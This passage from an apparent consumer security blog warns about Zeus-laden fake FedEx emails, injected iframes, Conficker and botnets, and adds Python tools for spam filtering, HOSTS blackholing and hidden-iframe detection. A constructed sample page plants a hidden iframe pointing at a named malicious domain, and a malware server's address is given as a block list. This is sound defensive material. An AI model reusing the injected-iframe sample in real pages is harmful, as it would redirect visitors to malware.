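    {"from": "pills@example.org", "to": OWN_ADDRESS, "subject": "Cialis at 70% off",
     "body": "Order now."},
    {"from": "boss@example.net", "to": OWN_ADDRESS, "subject": "Q3 report",
     "body": "Draft attached, comments by Friday."},
]


def is_self_forged(msg) -> bool:
    """From: is the recipient's own address. Such mail must not get the
    whitelist's free pass, which is the override the post describes."""
    return msg["from"].lower() == msg["to"].lower()


def classify(msg, rules, whitelist) -> str:
    if msg["from"].lower() in whitelist and not is_self_forged(msg):
        return "whitelisted"
    text = f"Subject: {msg['subject']}\n{msg['body']}"
    for category, pattern in rules:      # first matching rule wins
        if pattern.search(text):
            return category
    return "clean"


def run_week(messages, rules, whitelist):
    """Classify a week of mail. Returns the per-category counts and the rule
    list re-sorted so the most frequently hit categories are checked first."""
    counts = Counter(classify(m, rules, whitelist) for m in messages)
    ordered = sorted(rules, key=lambda rule: counts[rule[0]], reverse=True)
    return counts, ordered


def spam_percentage(counts) -> float:
    total = sum(counts.values())
    spam = total - counts["clean"] - counts["whitelisted"]
    return round(100.0 * spam / total, 1) if total else 0.0


if __name__ == "__main__":
    counts, ordered = run_week(MESSAGES, RULES, WHITELIST)
    print(counts, spam_percentage(counts))
    print("rule order for next week:", [name for name, _ in ordered])
```

Re-ordering rules by hit count only saves work safely when the rules are disjoint; a message that matches two rules is labelled by whichever comes first, so check the new order against last week's labels before adopting it.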

You can take preventative measures to secure your computers from becoming members of Botnets, by installing Trend Micro Internet Security and MalwareBytes Anti-Malware (see pages for details).

See my extended comments for this week's breakdown of spam by category, for Sept 27 - Oct 3, 2010, and the latest additions to my custom MailWasher Pro filters and Blacklist.

Continue reading "My Spam analysis & filter updates for the week of Sept 27 - Oct 3, 2010" »


August 31, 2010

Fake FedEx email with message in image and malware attachments

For a couple of days I have been seeing a new round of nasty Trojan attachments in emails posing as FedEx invoices. This scam is not new; it has been going on for months. The payload, in an attached zip file, has recently been either the Bredolab or the Zeus Trojan. Bredolab makes the PC a member of a spam and DDoS botnet. Zeus (Zbot) plants an information-stealing keylogger on your system, then protects it with a rootkit. Zeus watches for logins to a long list of popular banks, payment processors and online game sites, captures the keystrokes as you log in, and soon most of your money is gone to Russia.

Although the scam is not new, the method of delivering the convincing con has changed. This week has seen the arrival of the con being embedded in an inline image, in the .jpg format. The message I am looking at right now has the following text embedded as its content:

"Dear,
Unfortunately we failed to deliver the postal package you sent on the 27th of July in time because the recipient's address is erroneous. Please print out the invoice copy attached and collect the package at our office."

The message then screws its own pooch by displaying this odd text: "'Spiderman' climbs again in Sydney ." However, I'm sure that will disappear, as spam filters around the world tune in to that phrase.

The attachment, which claims to be a FedEx document (invoice), is inside a .zip file and is in fact a very dangerous Trojan. If you open the zip file and launch the embedded executable, your PC will become a zombie member of a spam and attack botnet, and/or will have the Zeus Trojan installed to steal your logins and money.

If you may have already fallen for this scam, please scan your computer with the Trend Micro online Housecall malware scanner. Then, if at all possible, update your existing anti-virus program and scan with it. If your anti-virus is old and the subscription is expired, download a free, fully functional trial of Trend Micro Internet Security. Install it, update it, then scan the entire computer.

Further, I recommend downloading, installing and scanning with Malwarebytes Anti-Malware (MBAM). Both of these security applications will detect the threats in the fake FedEx attachments, halt their hidden processes and delete their files. You will have to restart the PC and scan again, and may have to disable System Restore: many types of malware survive as copies in the hidden System Restore folder and are restored after you clean the machine and reboot. Turning off System Restore purges those copies. Don't forget to turn it back on after cleaning has completed!

If the malware prevents you from updating, installing, or running a real security program, go to the BleepingComputer malware removal forum, sign up for an account, read the instructions, then open a new topic requesting personal help. A trained volunteer malware removal expert will assist you as soon as he or she is able to. They will recommend free tools you can use to restore your PC to normal working condition. Read every word carefully and only do what you are asked to do.

Malwarebytes also has an expert malware removal assistance forum. Their forums are meant for people attempting to use MBAM to remove malware.

Both of the aforementioned programs will protect you from getting infected in the first place! Trend Micro Internet Security not only has regularly updated onboard malware definitions and behavioral analysis engines, but also consults a definitions server referred to as a "Cloud Server." As new releases of malware are captured (by security company honeypots), they are rapidly examined and new definitions are published to the Cloud servers, before they are pushed to client computers. Further, the destination websites are instantly blocked by the "Trend Micro Smart Protection Network." All subscribers to Trend Micro security programs are instantly protected from visiting those hostile websites and servers. You can learn more, download and purchase a subscription here.

Malwarebytes Anti-Malware is free to use in purely manual mode, but this won't protect you against reinfection. You can get realtime protection and automatic updating and scanning by paying $24.95 US dollars or equivalent in your currency, for a lifetime license. Read the details and download or purchase a license for MBAM here.


March 19, 2010

Spybot Search & Destroy updates for March 17, 2010

Spybot Search & Destroy is a free (for personal non-business use) anti-spyware/spyware removal program used by millions of people around the World, to protect their computers from spyware, adware, Trojans and other types of malware. Spybot updates for malware detections are released every Wednesday and this week's updates were released on schedule. If you are using Spybot S&D to protect your computer you should check for updates every Wednesday afternoon and apply all that are available.

Malware writers constantly modify their programs to evade detection, so anti-malware vendors have to issue regular updates to keep up with the bad guys. This week's additions are listed below: 11 new or modified fake security programs (fraudulent anti-virus/anti-spyware) were added to the "Malware" detections, plus 29 new or modified Trojans, rootkits and spam bots were added to the "Trojans" list. These include 2 variants of the infamous Zbot, a.k.a. Zeus, banking Trojan.

Note: one + sign before a detection indicates an update to an existing malware family for which previous definitions have been released. Two ++ signs indicate a completely new detection of a new or rewritten malware type.

Definition updates made on 03/17/2010

Adware
++ Ulineguide

Malware
++ Fraud.Antivirus7
++ Fraud.CleanUpAntivirus
++ Fraud.ContentCleaner
++ Fraud.ErrorWiz
++ Fraud.MyComGuard
+ Fraud.MySecurityWall
+ Fraud.PCSecurity2009
++ Fraud.PrivacyOn
++ Fraud.SmartSecurity
+ Fraud.Sysguard
++ Fraud.XPInternetSecurity2010
+ Lop
++ Win32.Downloader.aafm
+ Win32.FraudLoad.edt

Spyware
+ AdRotator
+ Win32.Spynet.a

Trojans
+ Virtumonde.sci
+ Virtumonde.sdn
++ Win32.Agent.ddod
++ Win32.Agent.fla
++ Win32.Agent.shi
+ Win32.Allaple.ab
+ Win32.Ambler
++ Win32.AutoRun.fw
++ Win32.Banker.ju
+ Win32.Banload.up
++ Win32.Clicker.ad
+ Win32.FakeAlert.ttam
+ Win32.FraudPack
++ Win32.IRCBot.sys
+ Win32.Koobface
+ Win32.OnLineGames.down
++ Win32.OnLineGames.mfbh
++ Win32.OnLineGames.mfeg
++ Win32.OnLineGames.mffa
++ Win32.OnLineGames.mffh
++ Win32.OnLineGames.mfgr
++ Win32.Rbot.mum
++ Win32.SdBot.wch
+ Win32.Swisyn
+ Win32.TDSS.rtk (rootkit)
+ Win32.ZBot (a.k.a.: Zeus)
+ Win32.ZBot.rtk (Zeus rootkit)
++ XPInternetSecurity2010.FakeAlert
+ Zlob.PornPassManager

Worm
+ Win32.Amburadul

Total: 2161084 checksums in 812212 rules for 5267 products.

Continue reading "Spybot Search & Destroy updates for March 17, 2010" »


June 26, 2009

Weekly roundup of vulnerabilities and exploits in the wild

Here is a summary of this week's vulnerabilities and exploits in the wild, as reported by Secunia, Websense and other security firms. Actually, this has been a quieter week than most.

Websense has been following a website code injection event they named the "Nine Ball Mass Injection," a follow-up to the "Beladen" and "Gumblar" mass injection attacks last month. This is a situation where cyber criminals exploit vulnerable web application scripts that have not been secured by the webmasters who operate those websites. Too many webmasters use free scripts that are rarely, if ever, updated to patch announced vulnerabilities. Hackers send out automated scripts (a.k.a. robots, spiders) that probe every website they come across and try to upload hostile files. Once they find an unpatched point of entry they can alter the code of any web page they want (usually the home page). In the past, hackers defaced home pages with gibberish or slogans for their causes. Now, it is criminals who plant hidden code that redirects innocent visitors to hostile websites, which then try to download malware to the victims' computers. Many of these attempts succeed, because most people do not, or cannot, keep up with the patches released by every vendor of the add-ons and plug-ins used by their browsers.

Most of the malware downloaded by Nine Ball and similar exploits is fake security software that pretends to scan your computer, announces that it found a number of threats, then demands payment to remove them. These are tandem programs: part one generates the fake alerts and part two is the fake remover. After you pay to unlock the remover, it only removes the alerts its sister planted in the first place. You will have handed your credit or debit card details to cyber criminals in the former Soviet Union and can expect to have your accounts drained shortly.

The rest of this week's vulnerabilities and exploits are in my extended comments.

Continue reading "Weekly roundup of vulnerabilities and exploits in the wild" »


May 1, 2009

Block Ukrainian Malware Server on Eurohost

Yesterday, April 30, 2009, when investigating a problem with an associate's websites, I traced a cross site scripting iframe exploit, pointing to a malware middleman website at tojandglow.com, which redirects victims to a hostile server hosted in Ukraine by Eurohost LLC. This Ukrainian server is currently dispensing malicious software that includes 9 Trojans, 7 scripting exploits and 1 virus.

The hostile iframe code was injected into the home pages of two related websites by exploiting vulnerabilities in a PHP script used by the webmaster of those websites. The server dispensing the exploits is located at 91.212.65.138, which coincides with the Eurohost home page. The CIDR assigned to Eurohost is 91.212.65.0/24 and you should block access to it in your firewall IP blocking rules, or in your Windows HOSTS file. Examples of how to do both are found below.

Any website running PHP or CGI scripts is in danger of becoming an inadvertent carrier of the redirection iframe that leads innocent visitors to servers rigged to exploit vulnerabilities in their browsers, browser add-ons, plug-ins, or helper objects. Some of the most frequently exploited applications are Internet Explorer (any version prior to 8.0), Adobe Flash, Adobe Reader and Apple QuickTime. Other exploited programs include Apple Safari, Google Chrome and occasionally Mozilla Firefox. On rare occasions the Opera browser and the Java plug-in are vulnerable to targeted attacks. Firefox and Opera are usually updated very quickly after a vulnerability is reported to their maintainers. Plug-ins usually take longer to update because they have to interact with so many other items and applications.

Webmasters and server administrators, you are responsible for keeping up to date with patches released by software authors, for any applications or scripts that you choose to run on your websites. Information to help you protect your websites and servers from getting exploited by hostile injection probes is in my extended comments.

Individuals browsing the Internet are the real targets of all of these injection attacks. This includes everybody reading this article. You and I have to constantly remain vigilant about threats to our computers' security. New exploits are found every month and are often released in the wild before software authors can respond with patched versions. Those are called zero day exploits. There are several ways to protect your computers from these exploits, including, but not limited to keeping up to date with all Windows, Mac or Linux updates and patches, and patches for commonly exploited third party browser add-ons, like Flash players, PDF Readers, Quicktime and Java plug-ins. Your next line of defense is a combination of security programs encompassing a 2-way firewall, anti-virus and anti-spyware and web threat protection that blocks hostile web pages. Or, you can install one top-notch security suite, like Trend Micro Internet Security and have all these protections and more in just one regularly updated package. There are links to reputable security products in the right sidebar on all of my blog pages.

Windows users have an additional means of keeping their PCs away from hostile websites. There is a special file, normally found in C:\Windows\System32\drivers\etc\, with the unusual file name HOSTS. Although it has no file extension it can be opened and edited with the built-in Windows Notepad. Each line pairs an IP address with one or more host names, separated by a tab or spaces, and Windows consults it before asking DNS. Note that it maps names only: a link that uses a numeric IP address bypasses it, so the Ukrainian server's address has to be blocked in your firewall rather than here. To protect your computer from being redirected to the hostile tojandglow website, open your HOSTS file and edit it using these steps.


  1. Using Start > (My) Computer, double-click on the C drive icon, then navigate to your Windows\System32\drivers\etc\ folder.

  2. Inside the "etc" folder you should see a file named "Hosts" You may have to unhide system files before this file can be seen. See my extended comments for details on how to do this.

  3. Right-click on the file named HOSTS and choose (left click) Properties

  4. Find the attributes section starting with "READ-ONLY" and uncheck it if it was checked

  5. Click Apply and OK to close the Properties window.

  6. Right-click on HOSTS while holding down the Shift key and select "Open With"

  7. Scroll through the programs list until you find "Notepad" and double-click on it

  8. If Notepad isn't listed you will have to use the browse button to navigate to the Windows folder, where Notepad.exe is located.

  9. With HOSTS open for editing go to the last line in the file and hit ENTER

  10. Add this line, with a tab after 127.0.0.1:

    • 127.0.0.1       tojandglow.com

  The IP address 91.212.65.138 and the block 91.212.65.0/24 do not belong in this file. HOSTS only translates names into addresses, so a link that already uses a numeric address never consults it, and it does not understand CIDR notation at all. Block those two in your firewall's IP rules instead.


  11. Click File > Save. If Notepad reports that access is denied (normal on Vista and Windows 7, where this file is protected by UAC), close it, start Notepad from the Start menu using "Run as administrator", open the file again from there and save. If a Save As dialog appears, set the file type to All Files and keep the name HOSTS, without an extension.

  12. Windows may decide to add a .txt extension anyway. If it does, allow this, then right-click on the saved file and delete the .txt extension. Answer the challenge about changing file extensions.


Reboot your computer, or run ipconfig /flushdns from a command prompt, to make this protection take effect. From then on any script that tries to redirect you to a name listed in the HOSTS file will instead be looped back to your own computer, 127.0.0.1, commonly called localhost. The injected iframe would display a "page cannot be found" error if it were visible (it isn't; it's only 1x1 pixel!). Do the same whenever a new hostile host name is published.

BTW: If you see any 127.0.0.1 entries referring to microsoft.com in your HOSTS file, remove them! Malware put them there to prevent you from getting Windows Updates or Microsoft security downloads. Ditto for any recognizable security vendors' websites.
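The procedure above, as an added Python example (not from the original post), working on the HOSTS text rather than the live file so it runs anywhere. It adds blackhole entries only for host names, refuses bare IP addresses and CIDR blocks (which HOSTS cannot block and which belong in firewall rules), skips names already present, and implements the check in the previous paragraph by listing any entry that redirects Microsoft or security-vendor domains. The protected-domain list and the sample file are constructed.

```python
import ipaddress

BLACKHOLE = "127.0.0.1"
# Domains no legitimate HOSTS entry should redirect (constructed list; extend as needed)
PROTECTED = ("microsoft.com", "windowsupdate.com", "trendmicro.com",
             "malwarebytes.org", "safer-networking.org")


def _entries(hosts_text: str):
    """Yield (address, [names]) for every non-comment, non-blank line."""
    for line in hosts_text.splitlines():
        body = line.split("#", 1)[0].strip()
        if body:
            fields = body.split()
            yield fields[0], [f.lower() for f in fields[1:]]


def _is_address(token: str) -> bool:
    """True for a bare IP ("91.212.65.138") or a CIDR block ("91.212.65.0/24")."""
    try:
        ipaddress.ip_network(token, strict=False)
        return True
    except ValueError:
        return False


def add_blackholes(hosts_text: str, targets):
    """Append 127.0.0.1 entries for host names not already present.
    Returns (new_text, rejected): addresses and CIDR blocks are rejected because
    HOSTS resolves names only; those belong in firewall rules."""
    known = {n for _, names in _entries(hosts_text) for n in names}
    lines = hosts_text.splitlines()
    rejected = []
    for target in targets:
        if _is_address(target):
            rejected.append(target)
            continue
        name = target.lower()
        if name not in known:
            lines.append(f"{BLACKHOLE}\t{name}")
            known.add(name)
    return "\n".join(lines) + "\n", rejected


def find_hijacked(hosts_text: str):
    """Entries that map update or security-vendor names anywhere at all:
    malware plants these to keep the victim away from patches and removal tools."""
    hits = []
    for address, names in _entries(hosts_text):
        for name in names:
            if any(name == d or name.endswith("." + d) for d in PROTECTED):
                hits.append((address, name))
    return hits


# Constructed sample: a stock file plus one entry planted by malware.
SAMPLE_HOSTS = """# constructed sample hosts file
127.0.0.1       localhost
127.0.0.1       update.microsoft.com
"""
TARGETS = ["tojandglow.com", "91.212.65.138", "91.212.65.0/24", "TOJANDGLOW.COM"]

if __name__ == "__main__":
    new_text, rejected = add_blackholes(SAMPLE_HOSTS, TARGETS)
    print(new_text)
    print("not host names, block in the firewall instead:", rejected)
    print("suspicious entries to remove:", find_hijacked(new_text))
```

On a real machine the text would be read from and written back to C:\Windows\System32\drivers\etc\hosts by an elevated process; the parsing and the two checks are the same.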

Continue reading "Block Ukrainian Malware Server on Eurohost" »


March 31, 2009

Conficker/Downadup Worm set to update on April 1, 2009

The newest version of the Conficker Worm, a.k.a. Downadup, said to have already infected over 10 million PCs, is programmed to begin contacting a huge list of new domain names on April 1, 2009. Each PC infected with the most recent variant will generate a list of 50,000 domain names per day, some of which might be registered by the criminals behind the Worm, then pick a sample of those names and try to contact them for further instructions or program updates. If those domains are in fact active and under the control of the botmasters running Conficker, updates will be sent to every PC making contact on or after April 1. Those updates will probably make it harder to disinfect these PCs, or to reach any security website for malware removal tools.

If you are not already infected it is because you took the proper preventative measures last October 23, 2008. That was the date Microsoft released a sudden, out-of-cycle critical update, security bulletin MS08-067 and Windows Update patch KB958644, which plugged a vulnerability in the Windows Server service. That vulnerability is what was exploited by the first two releases of the Conficker Worm (Conficker.A and .B). Since most Windows users who run legitimate copies of Windows have set their computers to receive and apply Automatic Updates, they were protected when the Worm was first released in the wild, in November 2008.

However, people who turned off Automatic Updates because they don't trust Microsoft updates, or because they are using pirated copies of Windows and don't want to get nagged about it, probably got hit by this Worm, soon after its release. The highest percentages of Conficker infections occurred in countries with the highest numbers of pirated Windows operating systems. These nations include China, Russia, Argentina, and Brazil.

I would like to point out that there is another group of vulnerable people, who may not realize that they are critically exposed to the Conficker Worm (and the likes). These are legitimately licensed users of Windows XP, or newer, who had to reinstall their operating systems to fix other problems or malware infections, any time after the MS08-067 patch was released. If you let any significant time elapse between reinstalling Windows and then obtaining all available patches, especially MS08-067, you could have been exposed to a Conficker attack and possibly been infected and don't know it yet (not likely - the Worm causes noticeable trouble on a PC). This is why I always make my first Internet connection after validation to Windows Updates (repeatedly, until all patches have been installed)!

If you want to know if your Windows PC is infected just try to go to Windows Updates, either via the link in your Start Menu, or using the link in Internet Explorer, under Tools. If you can't open Windows Updates at all, but can visit other non-security related websites (Yahoo, MSN, CNN, etc), you just may be Confickered. To find out for sure you should run scans with any anti virus software you have installed. Try to update it first, before scanning. If you are already infected with Conficker.B, or Conficker.C, you will not be able to update most anti virus definitions at all. This is caused by the Worm denying access to any website run by any major security vendor.

If this is the case for your PC(s) there is a downloadable Conficker Removal Tool available from BitDefender, which removes the Conficker A, B and C variants. The removal tool is available here. There is also an online scanner on the landing page, which you can run to see if you are indeed infected. If the BitDefender page is inaccessible, here is the URL for the online scanner: http://91.199.104.31

Note, that licensed users of Trend Micro Internet Security products are already protected against the Conficker threats.

I will have more to tell you about this Worm after tomorrow comes and goes. We will see what we shall see!


December 13, 2008

About computer Bots and how to detect and remove them

Computer "Bot"
Abbreviation for "robot." In this case a software robotic program.

A computer Bot is a remotely controlled malware program that is installed onto a computer without the knowledge or consent of the computer's owner. This type of program may have complete control over the operation of that computer and its Internet functions, but usually does not reveal its presence to the computer's owner or users, or try to interfere with the normal operation of that computer.

All Bots work in stealth mode, so as to prolong their useful lifetime on each computer they infect. Because Bots operate behind the scenes, sometimes as rootkits, special anti-malware tools are often needed to detect and remove them. Some Bots may even uninstall themselves if the computer or its Internet connection doesn't meet the minimum requirements set by the person running them.

When a Bot is installed onto a computer that computer will not only be remotely controlled, but will become an unwitting member of a network of similar Bots, known as a "Botnet." Bots are accumulated into Botnets by "Bot Herders" who rent the use of their remote controlled networks to spammers, scammers, phishers, political anarchists, hackers and even terrorists. A Botnet in action is under the remote command and control of a criminal known as a "Bot Master."

When a computer is first infected by a Bot it will perform certain pre-programmed routines, including "phoning home" to register itself on the Botnet it belongs to and to supply details about the computer onto which it is installed. Some of these details are about the operating system and amount of memory installed, the infected user's identity on the computer, the password for the Administrator account, what, if any security programs are installed, the type of Internet connection used and the IP address of both the computer and the modem (if different). It will then receive files to be consulted and used as it operates. It may also be given some means of protecting its own executables and auxiliary support files, to ensure its continued existence if it is detected by the owner.

Unless you are an expert in securing your computer and operate with reduced user privileges, you should be asking yourself: "am I botted?" Don't leave this question unanswered! Find out now! There are a variety of new, specialized security tools available that will detect and remove modern Bot infections. Some really good Bot detection tools are listed in my extended comments.

Continue reading "About computer Bots and how to detect and remove them" »


August 22, 2008

Botnets ramping up efforts using news headlines and video links

The authors of the Storm, Srizbi, Pushdo and Rustock botnets (and others) are ramping up their individual efforts to assemble the largest collective botnet the World has ever seen, using fake news headlines in the subject and body of spammed emails. The latest fake news about the Olympics is sent from the Storm Botnet. Almost all of the BotMasters are purported to be based in Russia and are members, or former members of the notorious Russian Business Network. The purpose of this rush to acquire more and more zombie computers in a short time is undisclosed right now, but may be in preparation for a cyber war, in which the zombie computers will be used in denial of service attacks against other governments, anti-Russian websites, universities, or military installations.

Or, the purpose may just be to have more power to send gazillions of spam messages hawking male enhancement pills, fake pharmaceuticals, shady loans, or counterfeit watches and shoes, but I think they already have enough zombie computers to do that work.

I don't want any of my readers to fall into these traps and have their PCs drafted into these hostile robotic armies. Therefore, you need to know that the authors of the tens of millions of spam messages that are spewing out of hundreds of thousands of zombie computers, some at the rate of up to 10,000 spam emails per day - per PC, are using every social engineering trick they can come up with to fool you into clicking on a link in just one of these scam messages.

The fake news alerts I referred to earlier usually have sensational subjects and short descriptions in the body, some of which match the subject, but some of which are totally unrelated. There may or may not be links to a real news website, but there is always one or more to a compromised computer or website, or directly to a hostile file. These hostile links may have the text "Read More," or "Watch Video," or "Play," etc. If you mouse over the links you will see the real destination in the status bar of your browser, for browser-based email, or your email client. They will not lead to CNN, or the news agency they claim to represent, but to a strange web site, or numeric IP, where you will be attacked by all manner of exploit codes.

If these automatic exploits fail to infect your computer you will be offered a manual link to do it to yourself. This is usually in the form of a pop-up about your needing to download a new version of ActiveX Object, or Flash Player, or Video Codec. Some of the most recent spam messages I have seen this week have direct links to download Trojan files. They are disguised by words like Play, Movie, Watch(it), Video, etc, to make you think you are going to see a movie clip about the news in the spam message. Instead, you will become instantly infected with whatever Trojan is being hosted on the destination web server, or zombie PC.

If you want to read the news online just go to cnn.com, or abc.com, etc, and read it. If you subscribe to breaking news alerts you could be fooled into opening a scam message that uses a subject and body text and images stolen from CNN, MSNBC, Reuters, or the BBC. Because of these scams being in the wild right now, and being so hard to authenticate, you are best to download a news widget from the organization to which you wish to subscribe. CNN has a breaking news widget that sits in the Windows System Tray until a news alert comes through. Then, it opens a balloon message above the System Tray with the headline displayed. If you click on the story it will open in your default browser. Other news organizations may offer a similar widget. Just be sure you go directly to the news website to look for it. Do not click on links in unsolicited email messages.

The volume of these messages is increasing, not decreasing, and the subjects, body text and link anchor text are morphing daily or twice daily. Learn to spot these scams and delete them from your inboxes. If you have a real email client that allows you to create filter rules, just add the subjects to your blacklist. If you use MailWasher Pro to screen your incoming email for spam or link threats, you can download and install my custom MailWasher Pro filters, which are updated frequently to detect these ever-changing scams. Since the Trojan video link spams began pumping out a couple of weeks ago I have sometimes been updating my published MailWasher filters on a daily basis. Contact me if you wish to consult with me about anti-spam solutions.
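The injected 1x1 iframe described in the May 1, 2009 post above and the "Watch Video" links described in this post come down to the same task: inspecting HTML for what the visible page hides. This Python scanner is an added example, not code from either post, and serves both: it flags iframes that are 0 or 1 pixel or hidden by style, links whose host is a raw IP address, links to executable or archive files, and links whose visible text names a different domain than the href actually goes to. The sample email body and sample web page are constructed (the iframe source reuses the domain named in the May 2009 post; the other hosts are documentation addresses).

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

EXEC_EXT = (".exe", ".scr", ".pif", ".bat", ".zip")
IPV4 = re.compile(r"^\d{1,3}(\.\d{1,3}){3}$")
# a host name appearing in visible link text, e.g. "cnn.com" or "www.bbc.co.uk"
HOSTISH = re.compile(r"\b(?:[a-z0-9-]+\.)+(?:com|net|org|co\.uk)\b", re.I)


def _base(name: str) -> str:
    """Last two labels ("www.cnn.com" -> "cnn.com"); good enough for the example."""
    return ".".join(name.lower().strip(".").split(".")[-2:])


def _tiny(value) -> bool:
    """True for a 0- or 1-pixel dimension, with or without 'px'."""
    m = re.match(r"\s*(\d+)", str(value)) if value is not None else None
    return m is not None and int(m.group(1)) <= 1


class Scanner(HTMLParser):
    def __init__(self):
        super().__init__()
        self.findings = []        # list of (kind, url)
        self._href = None
        self._text = []

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "iframe":
            style = (a.get("style") or "").replace(" ", "").lower()
            if (_tiny(a.get("width")) or _tiny(a.get("height"))
                    or "display:none" in style or "visibility:hidden" in style
                    or re.search(r"(?:left|top):-\d", style)):
                self.findings.append(("hidden-iframe", a.get("src") or ""))
        elif tag == "a":
            self._href, self._text = (a.get("href") or ""), []

    def handle_data(self, data):
        if self._href is not None:
            self._text.append(data)

    def handle_endtag(self, tag):
        if tag == "a" and self._href is not None:
            self._check_link(self._href, " ".join(self._text))
            self._href = None

    def _check_link(self, href, text):
        url = urlparse(href)
        host = (url.hostname or "").lower()
        if IPV4.match(host):
            self.findings.append(("link-to-raw-ip", href))
        if url.path.lower().endswith(EXEC_EXT):
            self.findings.append(("link-to-executable", href))
        claimed = HOSTISH.search(text)        # what the anchor text says it goes to
        if claimed and host and _base(host) != _base(claimed.group(0)):
            self.findings.append(("link-text-host-mismatch", href))


def scan_html(html: str):
    scanner = Scanner()
    scanner.feed(html)
    scanner.close()
    return scanner.findings


# Constructed samples: a "news alert" spam body and a web page with an injected iframe.
SAMPLE_EMAIL = """<html><body>
<p>'Spiderman' climbs again in Sydney</p>
<a href="http://192.0.2.10/video/play.php">Watch Video</a><br>
<a href="http://www.cnn.com/">www.cnn.com</a><br>
<a href="http://badnews.example/movie.exe">Read more at cnn.com</a>
</body></html>"""

SAMPLE_PAGE = """<html><body>
<h1>Welcome to our shop</h1>
<iframe src="http://tojandglow.com/" width="1" height="1" style="visibility: hidden"></iframe>
<iframe src="https://video.example/embed/42" width="640" height="360"></iframe>
</body></html>"""

if __name__ == "__main__":
    for kind, url in scan_html(SAMPLE_EMAIL) + scan_html(SAMPLE_PAGE):
        print(f"{kind:26} {url}")
```

Run against a saved copy of your own home page, the hidden-iframe finding is the webmaster's check for the injection described in the May 2009 post; run against a saved message source, the link findings are the mouse-over check from this post done for you.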


May 18, 2008

How to remove SpyBoss Pro from your computer

For the last week I have been seeing a lot of people visiting my blog looking for information about a program called SpyBoss Pro. Apparently, they have discovered it on their computers and don't know how to get rid of it. Let's learn a few things about the program and how it can be removed.

First of all, this is not your typical piece of malware. It is a commercial keylogging application, selling for $25 and up, requiring a license to use it after 30 days. It is distributed by a company in Ohio and is actually targeted at company security departments, to track employees' use of the Internet, or to allow concerned parents to track where their children go and what they type in chats and IMs. According to the manufacturer, here is what it is designed to do.

Records chats, instant messages, emails, web sites visited, what is searched for, what is done on MySpace.com, pictures posted and looked at, keystrokes typed, the programs run and more.

If you have discovered this program on an office computer you should tell your superior. It may or may not have been installed by your company. If it was you are being monitored officially. If not, somebody may be stealing confidential company information. If you find it on your home computer and did not knowingly purchase it, it was installed by stealth by persons up to no good. They may have used trickery to get this program onto your computer for two reasons. First, they might be affiliates earning commissions for every installation containing their affiliate codes. Second, they will be able to capture logins to your banks and other financial institutions where they will steal your money, or sell your information (and identity) to the highest bidder.

How to remove SpyBoss Pro.

You're gonna hate it when I tell you that since this is a legitimate program, albeit misused by hackers and overzealous affiliates, it comes with a standard Windows Uninstaller. Go to Start > Settings > Control Panel > Add/Remove Programs. Look through the list of programs until you find SpyBoss Pro and uninstall it using the "Remove" button, then reboot. This is assuming that the program hasn't been tampered with (cracked), but in case it has been altered by hackers, you should download, install and update Spybot Search and Destroy, then "immunize," then "check for problems." If the uninstaller failed to remove all or any of SpyBoss Pro - Spybot will finish the job for you. Best of all, Spybot S&D is free, supported totally by donations from grateful users. The latest definitions already detect and will remove this keylogger.

It is good practice to turn off Windows System Restore when disinfecting a PC, because many infectors hide their components by modifying critical system files, or registering their files as system files. Those files are backed up in the System Restore folder and tend to be reinstalled if found to be missing, on the next reboot. That's why some viruses and spyware keep coming back; they were backed up in your System Restore folder. If the uninstaller does remove SpyBoss Pro and Spybot doesn't find any further instance of it, you're probably good to go. But, if it still lurks after running the uninstaller, turn off System Restore, disinfect the computer, scan again, then turn on System Restore, when all is clear.

Follow-up actions

Since you know that there was an unwanted keylogger on your computer you need to change the login passwords to any banking, payments companies, auction sites, or online store accounts that you may have used while the keylogger was active. Check all balances and report any discrepancies to the fraud departments of these companies you do business with. You may have to cancel your debit or credit card and have a new one issued. If you cannot login to an account which you could before, go to the home page and search for contact information. They probably have a phone number you can call to report that you have become the victim of a keylogger. Many banks and payment portals will reverse any fraudulent transfers and get your money back, after you prove you are really you.


May 7, 2008

Malware threat from fake MP3 files and fastmp3player.com

There is a new malware threat in the wild circulating among various file sharing networks. The threat is spread by duping file sharing users into downloading fake mp3 audio and mpeg movie files, which have very enticing filenames (some listed below in extended comments). All of these fake files have very small file sizes, which should be a giveaway that something is wrong with them. Despite that fact, almost 400,000 PCs are now infected in just a few days, after their users downloaded and opened some of these rigged files.

When a file sharing user double-clicks to play one of these files they get a surprise. Instead of seeing a movie or hearing a music file they are presented with a browser page that displays a EULA consisting of about 4800 words. The scam tells them that they must install a special media player, from fastmp3player.com - to playback the file they are trying to hear/see. Upon agreeing to the EULA the user is redirected to fastmp3player.com where a file download box appears, for a file named (at this time) "PLAY_MP3.exe." This file will install two separate adware and spyware applications: "FBrowsingAdvisor" and "SurfingEnhancer."

Apparently, in samples that have been analyzed in the last two days, these attacks are specifically designed to work in the Firefox browser. If Firefox is not found on the victim's computer, they will get a Windows error message and will be urged to download and install Firefox.

Most major anti virus and anti spyware companies can already detect and remove this threat, which has been elevated to a "medium threat" status by McAfee, for home users.

People who like to obtain copyrighted music or movies without paying a fair price for a licensed copy are left at risk from botmasters looking to increase their botnets, and criminals using affiliate programs to earn commissions for installing spyware and adware onto as many computers as possible.

What you can do to protect your computer from this threat.

  1. Stop using file sharing programs like Limewire or Kazaa, or others, that allow people to distribute (share) copyrighted works illegally. They are riddled with malware files of all sorts. Instead, use one of the legitimate music or movie websites, like Apple's iTunes, Real Rhapsody, or Napster.

  2. Install a modern, legitimate anti virus program that offers multiple daily updates and set it to receive automatic updates every hour. If you can't set it to an hourly schedule then run a manual check for updates as often as you think about it. Or, use Windows Task Scheduler to run the updater executable every hour. Reputable anti virus companies include Trend Micro, Symantec, McAfee, NOD32 and AVG.

  3. Install a reputable anti spyware program and keep it updated as often as possible. Recommended companies include PCTools Spyware Doctor, Webroot's Spy Sweeper, Trend Micro PC-cillin, Lavasoft's Ad-Aware and anti-virus, and Spybot Search and Destroy.

  4. Scan for threats every day, before you get busy online, or every night, before you turn off the computer for the night.


March 6, 2008

Beware of a new round of Storm Trojan e-card scams

The infamous Storm Trojan Botnet has reawakened again, after a brief sleep. It last made its appearance towards the end of January, stayed active until Valentine's Day, then disappeared. Since July of 2007 the Storm Botnet is most well known for sending out spam messages containing links to view e-cards, or postcards. All of the resulting web pages are hosted on other storm infected botnetted computers and all of the links lead to your PC being infected with the same Trojan.

